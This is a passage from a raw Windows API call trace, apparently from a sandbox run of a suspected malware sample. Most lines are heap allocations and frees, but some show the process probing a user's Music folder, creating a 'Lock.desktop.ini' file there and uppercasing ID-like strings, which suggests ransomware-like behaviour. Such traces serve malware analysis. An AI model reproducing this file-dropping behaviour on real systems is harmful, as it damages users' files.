hHeap=0x25c0000) returned 1 [0251.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0251.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0251.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0251.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.656] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0251.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0251.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0251.656] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0251.656] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0251.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0251.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0251.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0251.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0251.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0251.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x249c7b0 [0251.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.657] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0251.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0251.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0251.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x34b2250 [0251.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0251.659] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music/Lock.desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0251.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0251.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0251.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0251.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0251.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0251.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0251.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.661] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0251.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0251.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0251.661] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0251.661] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0251.661] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0251.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0251.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0251.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0251.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0251.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0251.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0251.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0251.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0251.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0251.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0251.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0251.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0251.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0251.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0251.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0251.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0251.663] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0251.663] ReadFile (in: hFile=0x2c8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x1f8, lpOverlapped=0x0) returned 1 [0251.664] ReadFile (in: hFile=0x2c8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0251.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0251.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0251.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0251.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1f8) returned 0x24b2e00 [0251.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0251.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0251.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0251.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0251.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0251.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1f8) returned 0x24b3000 [0251.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0251.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0251.665] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0251.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0251.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0251.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1f8) returned 0x24b2e00 [0251.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0251.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0251.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0251.665] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0251.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0251.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0251.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0251.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0251.666] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0251.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0251.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0251.666] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0251.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0251.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0251.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0251.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0251.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1f8) returned 0x24b2e00 [0251.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0251.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0251.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0251.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0251.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c48 [0251.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0251.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8b0 [0251.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0251.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0251.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0251.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0251.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1f8) returned 0x24f4148 [0251.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0251.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0251.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0251.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0251.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0251.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0251.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0251.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0251.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0251.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0251.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0251.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0251.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0251.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0251.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0251.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0251.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0251.669] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0251.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0251.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0251.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0251.669] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0251.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0251.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0251.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0251.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0251.669] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0251.670] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0251.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0251.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0251.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0251.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0251.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0251.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0251.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0251.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0251.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0251.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0251.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.670] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 